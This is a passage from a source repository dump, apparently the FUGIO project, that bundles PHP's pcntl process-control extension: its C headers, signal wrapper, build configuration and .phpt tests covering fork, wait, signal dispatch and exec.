12 | --FILE--
13 | <?php
14 | echo "*** Test by calling method or function with its expected arguments, first print the child PID and the father ***\n";
15 | 
16 | $pid = pcntl_fork();
17 | if ($pid > 0) {
18 | 	pcntl_wait($status); 
19 | 	var_dump($pid);
20 | } else {
21 | 	var_dump($pid);
22 | }
23 | ?>
24 | --EXPECTF--
25 | *** Test by calling method or function with its expected arguments, first print the child PID and the father ***
26 | int(0)
27 | int(%d)
28 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_fork_variation.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test function pcntl_fork() by testing the process isolation in the forking hierarchy father -> son -> grandson where father can not knows his grandson
 3 | --CREDITS--
 4 | Marco Fabbri mrfabbri@gmail.com
 5 | Francesco Fullone ff@ideato.it
 6 | #PHPTestFest Cesena Italia on 2009-06-20
 7 | --SKIPIF--
 8 | <?php
 9 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
10 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
11 | ?>
12 | --FILE--
13 | <?php
14 | echo "*** Testing the process isolations between a process and its forks ***\n";
15 | 
16 | $pid = pcntl_fork();
17 | 
18 | if ($pid > 0) {
19 |   pcntl_wait($status); 
20 |   echo "father is $pid\n";
21 | 
22 |   if (!isset($pid2)) 
23 |   {
24 |     echo "father ($pid) doesn't know its grandsons\n";
25 |   }
26 | } 
27 | else 
28 | {
29 |   echo "son ($pid)\n";
30 |   $pid2 = pcntl_fork();
31 |   if ($pid2 > 0)
32 |   {	
33 |     pcntl_wait($status2); 
34 |     echo "son is father of $pid2\n";
35 |   } 
36 |   else 
37 |   {
38 |     echo "grandson ($pid2)\n";
39 |   }
40 | }
41 | ?>
42 | --EXPECTF--
43 | *** Testing the process isolations between a process and its forks ***
44 | son (0)
45 | grandson (0)
46 | son is father of %d
47 | father is %d
48 | father (%d) doesn't know its grandsons
49 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_get_last_error.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test pcntl_get_last_error()
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | ?>
 7 | --FILE--
 8 | <?php 
 9 | var_dump(pcntl_get_last_error());
10 | $pid = pcntl_wait($status);
11 | var_dump($pid);
12 | var_dump(pcntl_get_last_error() == PCNTL_ECHILD);
13 | ?>
14 | --EXPECT--
15 | int(0)
16 | int(-1)
17 | bool(true)
18 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_signal.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_signal()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | pcntl_signal(SIGTERM, function($signo){
 9 | 	echo "signal dispatched\n";
10 | });
11 | posix_kill(posix_getpid(), SIGTERM);
12 | pcntl_signal_dispatch();
13 | 
14 | var_dump(pcntl_signal());
15 | var_dump(pcntl_signal(SIGALRM, SIG_IGN));
16 | var_dump(pcntl_signal(-1, -1));
17 | var_dump(pcntl_signal(-1, function(){}));
18 | var_dump(pcntl_signal(SIGALRM, "not callable"));
19 | 
20 | 
21 | /* test freeing queue in RSHUTDOWN */
22 | posix_kill(posix_getpid(), SIGTERM);
23 | echo "ok\n";
24 | ?>
25 | --EXPECTF--
26 | signal dispatched
27 | 
28 | Warning: pcntl_signal() expects at least 2 parameters, 0 given in %s
29 | NULL
30 | bool(true)
31 | 
32 | Warning: pcntl_signal(): Invalid signal %s
33 | bool(false)
34 | 
35 | Warning: pcntl_signal(): Invalid signal %s
36 | bool(false)
37 | 
38 | Warning: pcntl_signal(): not callable is not a callable function name error in %s
39 | bool(false)
40 | ok
41 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_signal_dispatch.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcnt_signal_dispatch()
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("pcntl_signal_dispatch")) print "skip pcntl_signal_dispatch() not available";
 8 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 9 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
10 | ?>
11 | --FILE--
12 | <?php
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | pcntl_signal_dispatch();
20 | echo "Done!\n";
21 | 
22 | ?>
23 | --EXPECTF--
24 | Start!
25 | Signal handler called!
26 | Done!
27 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/pcntl_wait.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_wait()
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 6 | --FILE--
 7 | <?php
 8 | $pid = pcntl_fork();
 9 | if ($pid == 1) {
10 | 	die("failed");
11 | } else if ($pid) {
12 | 	$status = 0;
13 | 	pcntl_wait($status, WUNTRACED);
14 | 	var_dump(pcntl_wifexited($status));
15 | 	posix_kill($pid, SIGCONT);
16 | 
17 | 	pcntl_wait($status);
18 | 	var_dump(pcntl_wifsignaled($status));
19 | 	var_dump(pcntl_wifstopped($status));
20 | 	var_dump(pcntl_wexitstatus($status));
21 | 
22 | 	var_dump(pcntl_wait($status, WNOHANG | WUNTRACED));
23 | 	var_dump(pcntl_wait());
24 | 	var_dump(pcntl_waitpid());
25 | 
26 | 	var_dump(pcntl_wifexited());
27 | 	var_dump(pcntl_wifstopped());
28 | 	var_dump(pcntl_wifsignaled());
29 | 	var_dump(pcntl_wexitstatus());
30 | 	var_dump(pcntl_wtermsig());
31 | 	var_dump(pcntl_wstopsig());
32 | } else {
33 | 	posix_kill(posix_getpid(), SIGSTOP);
34 | 	exit(42);
35 | }
36 | ?>
37 | --EXPECTF--
38 | bool(false)
39 | bool(false)
40 | bool(false)
41 | int(42)
42 | int(-1)
43 | 
44 | Warning: pcntl_wait() expects at least 1 parameter, 0 given in %s
45 | NULL
46 | 
47 | Warning: pcntl_waitpid() expects at least 2 parameters, 0 given in %s
48 | NULL
49 | 
50 | Warning: pcntl_wifexited() expects exactly 1 parameter, 0 given in %s
51 | NULL
52 | 
53 | Warning: pcntl_wifstopped() expects exactly 1 parameter, 0 given in %s
54 | NULL
55 | 
56 | Warning: pcntl_wifsignaled() expects exactly 1 parameter, 0 given in %s
57 | NULL
58 | 
59 | Warning: pcntl_wexitstatus() expects exactly 1 parameter, 0 given in %s
60 | NULL
61 | 
62 | Warning: pcntl_wtermsig() expects exactly 1 parameter, 0 given in %s
63 | NULL
64 | 
65 | Warning: pcntl_wstopsig() expects exactly 1 parameter, 0 given in %s
66 | NULL
67 | 


--------------------------------------------------------------------------------
/Lib/pcntl56/tests/signal_closure_handler.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Closures as a signal handler
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip"; 
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 8 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
 9 | ?>
10 | --FILE--
11 | <?php
12 | declare (ticks = 1);
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | echo "Done!\n";
20 | 
21 | ?>
22 | --EXPECTF--
23 | Start!
24 | Signal handler called!
25 | Done!
26 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/README:
--------------------------------------------------------------------------------
 1 | Process Control Module for PHP (pcntl)
 2 | 
 3 | This module will attempt to implement all features related to process spawning and
 4 | control (fork(), waitpid(), signal(), WIF's, etc). This is extremely experimental,
 5 | with hope to become stable on most UNIX's. I greatly apreciate any feedback, fixes,
 6 | and or suggestions on how to improve/better implement
 7 | this functionality.
 8 | 
 9 | Thanks,
10 | 
11 | Jason Greeme < jason@inetgurus.net / jason@php.net >
12 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/config.m4:
--------------------------------------------------------------------------------
 1 | dnl
 2 | dnl $Id$
 3 | dnl
 4 | 
 5 | PHP_ARG_ENABLE(pcntl, whether to enable pcntl support,
 6 | [  --enable-pcntl          Enable pcntl support (CLI/CGI only)])
 7 | 
 8 | if test "$PHP_PCNTL" != "no"; then
 9 |   AC_CHECK_FUNCS(fork, [ AC_DEFINE(HAVE_FORK,1,[ ]) ], [ AC_MSG_ERROR(pcntl: fork() not supported by this platform) ])
10 |   AC_CHECK_FUNCS(waitpid, [ AC_DEFINE(HAVE_WAITPID,1,[ ]) ], [ AC_MSG_ERROR(pcntl: waitpid() not supported by this platform) ])
11 |   AC_CHECK_FUNCS(sigaction, [ AC_DEFINE(HAVE_SIGACTION,1,[ ]) ], [ AC_MSG_ERROR(pcntl: sigaction() not supported by this platform) ])
12 |   AC_CHECK_FUNCS([getpriority setpriority wait3 wait4 sigprocmask sigwaitinfo sigtimedwait])
13 | 
14 |   AC_MSG_CHECKING([for siginfo_t])
15 |   AC_TRY_COMPILE([
16 |     #include <signal.h>
17 |     #ifdef HAVE_SIGINFO_H
18 |       #include <siginfo.h>
19 |     #endif
20 |   ],[
21 |     siginfo_t info;
22 |   ],[
23 |     AC_MSG_RESULT([yes])
24 |     PCNTL_CFLAGS="-DHAVE_STRUCT_SIGINFO_T"
25 |   ], [
26 |     AC_MSG_RESULT([no])
27 |   ])
28 | 
29 |   PHP_NEW_EXTENSION(pcntl, pcntl.c php_signal.c, $ext_shared, cli, $PCNTL_CFLAGS)
30 | fi
31 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/package.xml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/FUGIO/bbcd8db1e8b0adb783237e54f820b14ed2f7b394/Lib/pcntl72/package.xml


--------------------------------------------------------------------------------
/Lib/pcntl72/php_pcntl.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |    +----------------------------------------------------------------------+
  3 |    | PHP Version 7                                                        |
  4 |    +----------------------------------------------------------------------+
  5 |    | Copyright (c) 1997-2018 The PHP Group                                |
  6 |    +----------------------------------------------------------------------+
  7 |    | This source file is subject to version 3.01 of the PHP license,      |
  8 |    | that is bundled with this package in the file LICENSE, and is        |
  9 |    | available through the world-wide-web at the following url:           |
 10 |    | http://www.php.net/license/3_01.txt                                  |
 11 |    | If you did not receive a copy of the PHP license and are unable to   |
 12 |    | obtain it through the world-wide-web, please send a note to          |
 13 |    | license@php.net so we can mail you a copy immediately.               |
 14 |    +----------------------------------------------------------------------+
 15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
 16 |    +----------------------------------------------------------------------+
 17 |  */
 18 | 
 19 | /* $Id$ */
 20 | 
 21 | #ifndef PHP_PCNTL_H
 22 | #define PHP_PCNTL_H
 23 | 
 24 | #if defined(WCONTINUED) && defined(WIFCONTINUED)
 25 | #define HAVE_WCONTINUED 1
 26 | #endif
 27 | 
 28 | extern zend_module_entry pcntl_module_entry;
 29 | #define phpext_pcntl_ptr &pcntl_module_entry
 30 | 
 31 | #include "php_version.h"
 32 | #define PHP_PCNTL_VERSION PHP_VERSION
 33 | 
 34 | PHP_MINIT_FUNCTION(pcntl);
 35 | PHP_MSHUTDOWN_FUNCTION(pcntl);
 36 | PHP_RINIT_FUNCTION(pcntl);
 37 | PHP_RSHUTDOWN_FUNCTION(pcntl);
 38 | PHP_MINFO_FUNCTION(pcntl);
 39 | 
 40 | PHP_FUNCTION(pcntl_alarm);
 41 | PHP_FUNCTION(pcntl_fork);
 42 | PHP_FUNCTION(pcntl_waitpid);
 43 | PHP_FUNCTION(pcntl_wait);
 44 | PHP_FUNCTION(pcntl_wifexited);
 45 | PHP_FUNCTION(pcntl_wifstopped);
 46 | PHP_FUNCTION(pcntl_wifsignaled);
 47 | #ifdef HAVE_WCONTINUED
 48 | PHP_FUNCTION(pcntl_wifcontinued);
 49 | #endif
 50 | PHP_FUNCTION(pcntl_wexitstatus);
 51 | PHP_FUNCTION(pcntl_wtermsig);
 52 | PHP_FUNCTION(pcntl_wstopsig);
 53 | PHP_FUNCTION(pcntl_signal);
 54 | PHP_FUNCTION(pcntl_signal_get_handler);
 55 | PHP_FUNCTION(pcntl_signal_dispatch);
 56 | PHP_FUNCTION(pcntl_get_last_error);
 57 | PHP_FUNCTION(pcntl_strerror);
 58 | #ifdef HAVE_SIGPROCMASK
 59 | PHP_FUNCTION(pcntl_sigprocmask);
 60 | #endif
 61 | #ifdef HAVE_STRUCT_SIGINFO_T
 62 | # if HAVE_SIGWAITINFO && HAVE_SIGTIMEDWAIT
 63 | PHP_FUNCTION(pcntl_sigwaitinfo);
 64 | PHP_FUNCTION(pcntl_sigtimedwait);
 65 | # endif
 66 | #endif
 67 | PHP_FUNCTION(pcntl_exec);
 68 | #ifdef HAVE_GETPRIORITY
 69 | PHP_FUNCTION(pcntl_getpriority);
 70 | #endif
 71 | #ifdef HAVE_SETPRIORITY
 72 | PHP_FUNCTION(pcntl_setpriority);
 73 | #endif
 74 | PHP_FUNCTION(pcntl_async_signals);
 75 | 
 76 | struct php_pcntl_pending_signal {
 77 | 	struct php_pcntl_pending_signal *next;
 78 | 	zend_long signo;
 79 | #ifdef HAVE_STRUCT_SIGINFO_T
 80 | 	siginfo_t siginfo;
 81 | #endif
 82 | };
 83 | 
 84 | ZEND_BEGIN_MODULE_GLOBALS(pcntl)
 85 | 	HashTable php_signal_table;
 86 | 	int processing_signal_queue;
 87 | 	struct php_pcntl_pending_signal *head, *tail, *spares;
 88 | 	int last_error;
 89 | 	volatile char pending_signals;
 90 | 	zend_bool async_signals;
 91 | ZEND_END_MODULE_GLOBALS(pcntl)
 92 | 
 93 | #ifdef ZTS
 94 | #define PCNTL_G(v) TSRMG(pcntl_globals_id, zend_pcntl_globals *, v)
 95 | #else
 96 | #define PCNTL_G(v)	(pcntl_globals.v)
 97 | #endif
 98 | 
 99 | #define REGISTER_PCNTL_ERRNO_CONSTANT(name) REGISTER_LONG_CONSTANT("PCNTL_" #name, name, CONST_CS | CONST_PERSISTENT)
100 | 
101 | #endif	/* PHP_PCNTL_H */
102 | 
103 | 
104 | /*
105 |  * Local variables:
106 |  * tab-width: 4
107 |  * c-basic-offset: 4
108 |  * indent-tabs-mode: t
109 |  * End:
110 |  */
111 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/php_signal.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 7                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2018 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id$ */
20 | 
21 | #include "TSRM.h"
22 | #include "php_signal.h"
23 | #include "Zend/zend.h"
24 | #include "Zend/zend_signal.h"
25 | 
26 | /* php_signal using sigaction is derived from Advanced Programing
27 |  * in the Unix Environment by W. Richard Stevens p 298. */
28 | Sigfunc *php_signal4(int signo, Sigfunc *func, int restart, int mask_all)
29 | {
30 | 	struct sigaction act,oact;
31 | 
32 | #ifdef HAVE_STRUCT_SIGINFO_T
33 | 	act.sa_sigaction = func;
34 | #else
35 | 	act.sa_handler = func;
36 | #endif
37 | 	if (mask_all) {
38 | 		sigfillset(&act.sa_mask);
39 | 	} else {
40 | 		sigemptyset(&act.sa_mask);
41 | 	}
42 | 	act.sa_flags = 0;
43 | #ifdef HAVE_STRUCT_SIGINFO_T
44 | 	act.sa_flags |= SA_SIGINFO;
45 | #endif
46 | 	if (signo == SIGALRM || (! restart)) {
47 | #ifdef SA_INTERRUPT
48 | 		act.sa_flags |= SA_INTERRUPT; /* SunOS */
49 | #endif
50 | 	} else {
51 | #ifdef SA_RESTART
52 | 		act.sa_flags |= SA_RESTART; /* SVR4, 4.3+BSD */
53 | #endif
54 | 	}
55 | 	if (zend_sigaction(signo, &act, &oact) < 0) {
56 | 		return (Sigfunc*)SIG_ERR;
57 | 	}
58 | 
59 | #ifdef HAVE_STRUCT_SIGINFO_T
60 | 	return oact.sa_sigaction;
61 | #else
62 | 	return oact.sa_handler;
63 | #endif
64 | }
65 | 
66 | Sigfunc *php_signal(int signo, Sigfunc *func, int restart)
67 | {
68 | 	return php_signal4(signo, func, restart, 0);
69 | }
70 | 
71 | /*
72 |  * Local variables:
73 |  * tab-width: 4
74 |  * c-basic-offset: 4
75 |  * End:
76 |  * vim600: noet sw=4 ts=4 fdm=marker
77 |  * vim<600: noet sw=4 ts=4
78 |  */
79 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/php_signal.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |    +----------------------------------------------------------------------+
 3 |    | PHP Version 7                                                        |
 4 |    +----------------------------------------------------------------------+
 5 |    | Copyright (c) 1997-2018 The PHP Group                                |
 6 |    +----------------------------------------------------------------------+
 7 |    | This source file is subject to version 3.01 of the PHP license,      |
 8 |    | that is bundled with this package in the file LICENSE, and is        |
 9 |    | available through the world-wide-web at the following url:           |
10 |    | http://www.php.net/license/3_01.txt                                  |
11 |    | If you did not receive a copy of the PHP license and are unable to   |
12 |    | obtain it through the world-wide-web, please send a note to          |
13 |    | license@php.net so we can mail you a copy immediately.               |
14 |    +----------------------------------------------------------------------+
15 |    | Author: Jason Greene <jason@inetgurus.net>                           |
16 |    +----------------------------------------------------------------------+
17 | */
18 | 
19 | /* $Id$ */
20 | 
21 | #include <signal.h>
22 | #ifndef PHP_SIGNAL_H
23 | #define PHP_SIGNAL_H
24 | 
25 | #ifdef HAVE_STRUCT_SIGINFO_T
26 | typedef void Sigfunc(int, siginfo_t*, void*);
27 | #else
28 | typedef void Sigfunc(int);
29 | #endif
30 | Sigfunc *php_signal(int signo, Sigfunc *func, int restart);
31 | Sigfunc *php_signal4(int signo, Sigfunc *func, int restart, int mask_all);
32 | 
33 | #endif
34 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/001.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test pcntl wait functionality
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip";
 6 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 7 | ?>
 8 | --FILE--
 9 | <?php
10 | function test_exit_waits(){
11 | 	print "\n\nTesting pcntl_wifexited and wexitstatus....";
12 | 
13 | 	$pid=pcntl_fork();
14 | 	if ($pid==0) {
15 | 		sleep(1);
16 | 		exit(-1);
17 | 	} else {
18 | 		$options=0;
19 | 		pcntl_waitpid($pid, $status, $options);
20 | 		if ( pcntl_wifexited($status) ) print "\nExited With: ". pcntl_wexitstatus($status);
21 | 	}
22 | }
23 | 
24 | function test_exit_signal(){
25 | 	print "\n\nTesting pcntl_wifsignaled....";
26 | 
27 | 	$pid=pcntl_fork();
28 | 
29 | 	if ($pid==0) {
30 | 		sleep(10);
31 | 		exit;
32 | 	} else {
33 | 		$options=0;
34 | 		posix_kill($pid, SIGTERM);
35 | 		pcntl_waitpid($pid, $status, $options);
36 | 		if ( pcntl_wifsignaled($status) ) {
37 | 			$signal_print=pcntl_wtermsig($status);
38 | 			if ($signal_print==SIGTERM) $signal_print="SIGTERM";
39 | 			print "\nProcess was terminated by signal : ". $signal_print;
40 | 		}
41 | 
42 | 	}
43 | }
44 | 
45 | 
46 | function test_stop_signal(){
47 | 	print "\n\nTesting pcntl_wifstopped and pcntl_wstopsig....";
48 | 
49 | 	$pid=pcntl_fork();
50 | 
51 | 	if ($pid==0) {
52 | 		sleep(1);
53 | 		exit;
54 | 	} else {
55 | 		$options=WUNTRACED;
56 | 		posix_kill($pid, SIGSTOP);
57 | 		pcntl_waitpid($pid, $status, $options);
58 | 		if ( pcntl_wifstopped($status) ) {
59 | 			$signal_print=pcntl_wstopsig($status);
60 | 			if ($signal_print==SIGSTOP) $signal_print="SIGSTOP";
61 | 			print "\nProcess was stoped by signal : ". $signal_print;
62 | 		}
63 | 		posix_kill($pid, SIGCONT);
64 | 	}
65 | }
66 | 
67 | print "Staring wait.h tests....";
68 | test_exit_waits();
69 | test_exit_signal();
70 | test_stop_signal();
71 | ?>
72 | --EXPECT--
73 | Staring wait.h tests....
74 | 
75 | Testing pcntl_wifexited and wexitstatus....
76 | Exited With: 255
77 | 
78 | Testing pcntl_wifsignaled....
79 | Process was terminated by signal : SIGTERM
80 | 
81 | Testing pcntl_wifstopped and pcntl_wstopsig....
82 | Process was stoped by signal : SIGSTOP
83 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/async_signals.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Asynchronous signal handling through VM interrupts
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip";
 6 | 	elseif (!function_exists("pcntl_signal")) print "skip pcntl_signal() not available";
 7 | 	elseif (!function_exists("posix_kill")) print "skip posix_kill() not available";
 8 | 	elseif (!function_exists("posix_getpid")) print "skip posix_getpid() not available";
 9 | ?>
10 | --FILE--
11 | <?php
12 | pcntl_async_signals(1);
13 | 
14 | pcntl_signal(SIGTERM, function ($signo) { echo "Signal handler called!\n"; });
15 | 
16 | echo "Start!\n";
17 | posix_kill(posix_getpid(), SIGTERM);
18 | $i = 0; // dummy
19 | echo "Done!\n";
20 | 
21 | ?>
22 | --EXPECTF--
23 | Start!
24 | Signal handler called!
25 | Done!
26 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/bug72154.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Bug #72154 (pcntl_wait/pcntl_waitpid array internal structure overwrite)
 3 | --SKIPIF--
 4 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 5 | --FILE--
 6 | <?php
 7 | $b = 666;
 8 | var_dump($b);
 9 | $c = &$b;
10 | $var5 = pcntl_wait($b,0,$c);
11 | unset($b);
12 | 
13 | $b = 666;
14 | var_dump($b);
15 | $c = &$b;
16 | $var5 = pcntl_waitpid(0,$b,0,$c);
17 | unset($b);
18 | ?>
19 | --EXPECT--
20 | int(666)
21 | int(666)
22 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/bug73783.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Bug #73783: (SIG_IGN needs to be set to prevent syscals from returning early)
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
 6 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
 7 | ?>
 8 | --FILE--
 9 | <?php
10 | pcntl_signal(SIGCHLD, SIG_IGN);
11 | 
12 | switch(pcntl_fork()) {
13 |     case 0:
14 |         exit;
15 |         break;
16 | }
17 | 
18 | $before = microtime(true);
19 | sleep(1);
20 | 
21 | if (microtime(true) - $before >= 0.8) {
22 |     echo "working\n";
23 | } else {
24 |     echo "failed\n";
25 | }
26 | ?>
27 | --EXPECTF--
28 | working
29 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_exec.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec()
 3 | --SKIPIF--
 4 | <?php
 5 | if (!extension_loaded("pcntl")) print "skip";
 6 | if (!getenv("TEST_PHP_EXECUTABLE") || !is_executable(getenv("TEST_PHP_EXECUTABLE"))) die("skip TEST_PHP_EXECUTABLE not set");
 7 | ?>
 8 | --FILE--
 9 | <?php
10 | echo "ok\n";
11 | pcntl_exec(getenv("TEST_PHP_EXECUTABLE"), ['-n']);
12 | echo "nok\n";
13 | ?>
14 | --EXPECT--
15 | ok
16 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_exec_2.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_exec() 2
 3 | --SKIPIF--
 4 | <?php
 5 | 
 6 | if (!extension_loaded("pcntl")) print "skip";
 7 | if (!getenv("TEST_PHP_EXECUTABLE") || !is_executable(getenv("TEST_PHP_EXECUTABLE"))) die("skip TEST_PHP_EXECUTABLE not set");
 8 | 
 9 | ?>
10 | --FILE--
11 | <?php
12 | if (getenv("PCNTL_EXEC_TEST_IS_CHILD")) {
13 | 	var_dump(getenv("FOO"));
14 | 	exit;
15 | }
16 | echo "ok\n";
17 | pcntl_exec(getenv("TEST_PHP_EXECUTABLE"), array('-n', __FILE__), array(
18 | 	"PCNTL_EXEC_TEST_IS_CHILD" => "1",
19 | 	"FOO" => "BAR",
20 | 	1 => "long")
21 | );
22 | 
23 | echo "nok\n";
24 | ?>
25 | --EXPECT--
26 | ok
27 | string(3) "BAR"
28 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_fork_basic.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test function pcntl_fork() by calling it with its expected arguments
 3 | --CREDITS--
 4 | Marco Fabbri mrfabbri@gmail.com
 5 | Francesco Fullone ff@ideato.it
 6 | #PHPTestFest Cesena Italia on 2009-06-20
 7 | --SKIPIF--
 8 | <?php
 9 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
10 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
11 | ?>
12 | --FILE--
13 | <?php
14 | echo "*** Test by calling method or function with its expected arguments, first print the child PID and the father ***\n";
15 | 
16 | $pid = pcntl_fork();
17 | if ($pid > 0) {
18 | 	pcntl_wait($status);
19 | 	var_dump($pid);
20 | } else {
21 | 	var_dump($pid);
22 | }
23 | ?>
24 | --EXPECTF--
25 | *** Test by calling method or function with its expected arguments, first print the child PID and the father ***
26 | int(0)
27 | int(%d)
28 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_fork_variation.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test function pcntl_fork() by testing the process isolation in the forking hierarchy father -> son -> grandson where father can not knows his grandson
 3 | --CREDITS--
 4 | Marco Fabbri mrfabbri@gmail.com
 5 | Francesco Fullone ff@ideato.it
 6 | #PHPTestFest Cesena Italia on 2009-06-20
 7 | --SKIPIF--
 8 | <?php
 9 | 	if (!extension_loaded('pcntl')) die('skip pcntl extension not available');
10 | 	elseif (!extension_loaded('posix')) die('skip posix extension not available');
11 | ?>
12 | --FILE--
13 | <?php
14 | echo "*** Testing the process isolations between a process and its forks ***\n";
15 | 
16 | $pid = pcntl_fork();
17 | 
18 | if ($pid > 0) {
19 |   pcntl_wait($status);
20 |   echo "father is $pid\n";
21 | 
22 |   if (!isset($pid2))
23 |   {
24 |     echo "father ($pid) doesn't know its grandsons\n";
25 |   }
26 | }
27 | else
28 | {
29 |   echo "son ($pid)\n";
30 |   $pid2 = pcntl_fork();
31 |   if ($pid2 > 0)
32 |   {
33 |     pcntl_wait($status2);
34 |     echo "son is father of $pid2\n";
35 |   }
36 |   else
37 |   {
38 |     echo "grandson ($pid2)\n";
39 |   }
40 | }
41 | ?>
42 | --EXPECTF--
43 | *** Testing the process isolations between a process and its forks ***
44 | son (0)
45 | grandson (0)
46 | son is father of %d
47 | father is %d
48 | father (%d) doesn't know its grandsons
49 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_get_last_error.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | Test pcntl_get_last_error()
 3 | --SKIPIF--
 4 | <?php
 5 | 	if (!extension_loaded("pcntl")) print "skip";
 6 | ?>
 7 | --FILE--
 8 | <?php
 9 | var_dump(pcntl_get_last_error());
10 | $pid = pcntl_wait($status);
11 | var_dump($pid);
12 | var_dump(pcntl_get_last_error() == PCNTL_ECHILD);
13 | ?>
14 | --EXPECT--
15 | int(0)
16 | int(-1)
17 | bool(true)
18 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_realtime_signal.phpt:
--------------------------------------------------------------------------------
 1 | --TEST--
 2 | pcntl_signal() context of realtime signal
 3 | --SKIPIF--
 4 | <?php if (!defined('SIGRTMIN')) die("skip realtime signal not supported"); ?>
 5 | <?php if (!extension_loaded("pcntl")) print "skip"; ?>
 6 | <?php if (!extension_loaded("posix")) die("skip posix extension not available"); ?>
 7 | --FILE--
 8 | <?php
 9 | 
10 | pcntl_signal(SIGRTMIN, function ($signo, $siginfo) {
11 |     printf("got realtime signal from %s, ruid:%s\n", $siginfo['pid'] ?? '', $siginfo['uid'] ?? '');
12 | });
13 | posix_kill(posix_getpid(), SIGRTMIN);
14 | pcntl_signal_dispatch();
15 | 
16 | echo "ok\n";
17 | ?>
18 | --EXPECTF--
19 | %rgot realtime signal from \d+, ruid:\d+%r
20 | ok
21 | 


--------------------------------------------------------------------------------
/Lib/pcntl72/tests/pcntl_signal.phpt:
--------------------------------------------------------------------------------
